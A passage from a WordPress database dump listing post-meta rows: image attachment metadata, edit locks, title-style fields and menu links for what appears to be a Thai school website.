(1665,525,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952130.jpg\";s:8:\"filesize\";i:574683;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952130-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17980;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952130-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154640;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952130-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8747;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952130-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93536;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952130-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:298628;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952130-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22988;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1666,526,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952132.jpg\";s:8:\"filesize\";i:452703;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952132-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15348;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952132-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124345;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952132-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7569;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952132-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76314;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952132-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:237159;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952132-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19718;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1667,527,'_wp_attached_file','2024/08/S__68952140.jpg'),
(1668,527,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952140.jpg\";s:8:\"filesize\";i:602362;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952140-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19051;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952140-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166269;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952140-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9310;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952140-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100942;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952140-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:316639;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952140-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24466;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1669,528,'_wp_attached_file','2024/08/S__68952145.jpg'),
(1670,528,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952145.jpg\";s:8:\"filesize\";i:518621;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952145-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18063;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952145-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143489;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952145-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8491;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952145-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88407;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952145-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:272618;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952145-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23269;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1671,529,'_wp_attached_file','2024/08/S__68952158.jpg'),
(1672,529,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952158.jpg\";s:8:\"filesize\";i:482703;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952158-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16972;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952158-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133704;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952158-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8668;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952158-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82641;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952158-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:252824;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952158-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21501;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1673,530,'_wp_attached_file','2024/08/S__68952163.jpg'),
(1674,531,'_wp_attached_file','2024/08/S__68952155.jpg'),
(1675,532,'_wp_attached_file','2024/08/S__68952149.jpg'),
(1676,530,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952163.jpg\";s:8:\"filesize\";i:519349;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952163-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18391;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952163-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145336;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952163-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8511;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952163-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89917;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952163-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:274097;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952163-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23847;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1677,531,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952155.jpg\";s:8:\"filesize\";i:471354;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952155-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19497;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952155-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952155-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9219;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952155-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94033;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952155-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271049;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952155-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24690;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1678,532,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952149.jpg\";s:8:\"filesize\";i:583988;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952149-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19481;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952149-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168248;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952149-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9671;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952149-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103207;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952149-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:317991;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952149-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25899;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1679,533,'_wp_attached_file','2024/08/S__68952167.jpg'),
(1680,533,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952167.jpg\";s:8:\"filesize\";i:617577;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952167-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19833;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952167-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170675;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952167-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9891;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952167-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104289;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952167-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:326838;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952167-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25490;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1681,534,'_wp_attached_file','2024/08/S__68952182.jpg'),
(1682,534,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952182.jpg\";s:8:\"filesize\";i:610357;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952182-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19853;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952182-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168416;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952182-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9673;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952182-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103098;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952182-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:321800;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952182-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25608;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1683,535,'_wp_attached_file','2024/08/S__68952183.jpg'),
(1684,535,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__68952183.jpg\";s:8:\"filesize\";i:620915;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__68952183-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19892;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__68952183-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170385;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952183-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9633;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__68952183-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103816;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__68952183-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:327559;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__68952183-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25748;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1686,520,'_edit_last','1'),
(1687,520,'title_style','default'),
(1688,520,'_title_style','field_5d1a0217cf408'),
(1689,520,'related',''),
(1690,520,'_related','field_603b51c3e183e'),
(1691,536,'title_style','default'),
(1692,536,'_title_style','field_5d1a0217cf408'),
(1693,536,'related',''),
(1694,536,'_related','field_603b51c3e183e'),
(1695,14,'_thumbnail_id','532'),
(1697,520,'_thumbnail_id','532'),
(1699,538,'title_style','default'),
(1700,538,'_title_style','field_5d1a0217cf408'),
(1704,542,'_edit_lock','1747989444:1'),
(1706,542,'_edit_last','1'),
(1707,542,'title_style','default'),
(1708,542,'_title_style','field_5d1a0217cf408'),
(1709,544,'title_style','default'),
(1710,544,'_title_style','field_5d1a0217cf408'),
(1711,545,'title_style','default'),
(1712,545,'_title_style','field_5d1a0217cf408'),
(1713,546,'_edit_lock','1751428790:1'),
(1714,546,'_edit_last','1'),
(1715,546,'title_style','hidden'),
(1716,546,'_title_style','field_5d1a0217cf408'),
(1717,547,'title_style','default'),
(1718,547,'_title_style','field_5d1a0217cf408'),
(1720,549,'title_style','default'),
(1721,549,'_title_style','field_5d1a0217cf408'),
(1722,550,'title_style','default'),
(1723,550,'_title_style','field_5d1a0217cf408'),
(1725,552,'title_style','default'),
(1726,552,'_title_style','field_5d1a0217cf408'),
(1727,16,'_wp_old_date','2024-08-01'),
(1729,17,'_wp_old_date','2024-08-01'),
(1731,18,'_wp_old_date','2024-08-01'),
(1733,19,'_wp_old_date','2024-08-01'),
(1735,20,'_wp_old_date','2024-08-01'),
(1737,553,'_menu_item_type','custom'),
(1738,553,'_menu_item_menu_item_parent','17'),
(1739,553,'_menu_item_object_id','553'),
(1740,553,'_menu_item_object','custom'),
(1741,553,'_menu_item_target',''),
(1742,553,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1743,553,'_menu_item_xfn',''),
(1744,553,'_menu_item_url','http://pakhaeng.ssk.in.th/?page_id=643'),
(1746,554,'_menu_item_type','custom'),
(1747,554,'_menu_item_menu_item_parent','17'),
(1748,554,'_menu_item_object_id','554'),
(1749,554,'_menu_item_object','custom'),
(1750,554,'_menu_item_target',''),
(1751,554,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1752,554,'_menu_item_xfn',''),
(1753,554,'_menu_item_url','http://pakhaeng.ssk.in.th/?page_id=609'),
(1771,561,'footnotes',''),
(1772,562,'title_style','default'),
(1773,562,'_title_style','field_5d1a0217cf408'),
(1774,563,'_edit_lock','1751872843:1'),
(1775,563,'_edit_last','1'),
(1776,563,'title_style','hidden'),
(1777,563,'_title_style','field_5d1a0217cf408'),
(1778,564,'title_style','default'),
(1779,564,'_title_style','field_5d1a0217cf408'),
(1780,565,'title_style','default'),
(1781,565,'_title_style','field_5d1a0217cf408'),
(1782,566,'_edit_lock','1751875610:1'),
(1783,567,'_wp_attached_file','2024/08/แผนการบริหารและพัฒนาทรัพยากรบุคคล.pdf'),
(1784,567,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2273500;}'),
(1785,566,'_edit_last','1'),
(1786,566,'title_style','hidden'),
(1787,566,'_title_style','field_5d1a0217cf408'),
(1788,568,'title_style','default'),
(1789,568,'_title_style','field_5d1a0217cf408'),
(1791,570,'title_style','default'),
(1792,570,'_title_style','field_5d1a0217cf408'),
(1793,571,'_wp_attached_file','2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner.png'),
(1794,571,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:214:\"2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner.png\";s:8:\"filesize\";i:211042;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:213:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39463;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:214:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27086;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:214:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204897;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:214:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76693;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
